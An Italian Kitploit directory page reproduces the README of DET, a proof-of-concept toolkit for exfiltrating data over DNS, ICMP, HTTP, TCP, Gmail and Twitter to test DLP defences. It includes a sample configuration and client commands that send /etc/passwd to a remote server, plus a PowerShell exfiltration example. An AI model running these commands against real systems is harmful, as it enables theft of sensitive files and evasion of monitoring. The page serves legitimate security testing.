Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DET — (estendibile) Kit di esfiltrazione dati (DET) | Kitploit
Strumenti/GitHubGitHub/sensepost/det
Strumenti di Crittografia/DecrittografiaEsfiltrazione DatiSicurezza di RetePenetration TestingRed TeamingAnalisi DNS
GitHubsensepost/det

DET

(estendibile) Kit di esfiltrazione dati (DET)

Vedi Repository
8211908 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DET (estendibile) Toolkit per l'esfiltrazione di dati

=======

DET (è fornito COSÌ COM'È), è una proof of concept per eseguire l'esfiltrazione di dati utilizzando uno o più canali contemporaneamente.

Questa è una Proof of Concept volta a identificare possibili fallimenti DLP. Non dovrebbe mai essere utilizzata per esfiltrare dati sensibili/di produzione (ad esempio in una valutazione).

L'idea era di creare un toolkit generico per collegare qualsiasi tipo di protocollo/servizio al fine di testare la configurazione di soluzioni di Network Monitoring e Data Leakage Prevention (DLP) implementate, contro diverse tecniche di esfiltrazione dei dati.

Il repository principale è ora spostato qui.

Slide

DET è stato presentato al BSides Ljubljana il 9 marzo 2016 e le diapositive saranno disponibili qui. Le diapositive sono disponibili qui.

Esempio di utilizzo (plugin ICMP)

Lato server:

asciicast

Lato client:

asciicast

Utilizzo combinando due canali (Gmail/Twitter)

Lato server:

asciicast

Lato client:

asciicast

Installazione

Clona il repository:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

Poi:

root@kitploit:~
pip install -r requirements.txt --user

Configurazione

Per utilizzare DET, è necessario configurarlo e aggiungere le proprie impostazioni (ad es. SMTP/IMAP, passphrase di crittografia AES256 e così via). È stato fornito un file di configurazione di esempio chiamato: config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Utilizzo

Aiuto utilizzo

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Lato server:

Per caricare tutti i plugin:

root@kitploit:~
python det.py -L -c ./config.json

Per caricare solo i moduli twitter e gmail:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

Per caricare tutti i plugin ed escludere DNS:

root@kitploit:~
python det.py -L -c ./config.json -e dns

Lato client:

Per caricare tutti i plugin:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

Per caricare solo i moduli twitter e gmail:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

Per caricare tutti i plugin ed escludere DNS:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

E in PowerShell (modulo HTTP):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Moduli

Finora, DET supporta diversi protocolli, elencati qui:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (es. Gmail)
  • Raw TCP
  • Implementazione PowerShell (HTTP, DNS, ICMP, SMTP (usato con Gmail))

E altri "servizi":

  • Google Docs (Non autenticato)
  • Twitter (Messaggi diretti)

Moduli sperimentali

Finora, sono impegnato nell'implementazione di nuovi moduli quasi pronti per il rilascio, tra cui:

  • Skype (95% fatto)
  • Tor (80% fatto)
  • Github (30/40% fatto)

Roadmap

  • Aggiungere crittografia adeguata (es. AES-256) Grazie a ryanohoro
  • Compressione (estremamente importante!) Grazie a chokepoint
  • Offuscamento dati adeguato e integrazione di Cloakify Toolset Toolset
  • Moduli FTP, Flickr LSB Steganography e Youtube

Riferimenti

Alcuni riferimenti/crediti molto interessanti a persone da cui ho preso ispirazione con i loro progetti:

  • https://github.com/nullbind/Powershellery/ di Nullbind.
  • https://github.com/ytisf/PyExfil, davvero fantastico.
  • https://github.com/m57/dnsteal di m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu di 3nc0d3r.
  • https://github.com/glennzw/exphil di Glenn Wilkinson.
  • WebExfile di Saif El-Sherei

Contatti/Contributi

Puoi contattarmi su Twitter @PaulWebSec. Sentiti libero di contribuire, clonare, forkare, inviare la tua PR e così via.

Licenza

DET è concesso in licenza sotto Licenza MIT. Le autorizzazioni oltre lo scopo di questa licenza possono essere disponibili presso [email protected].

Scarica lo strumento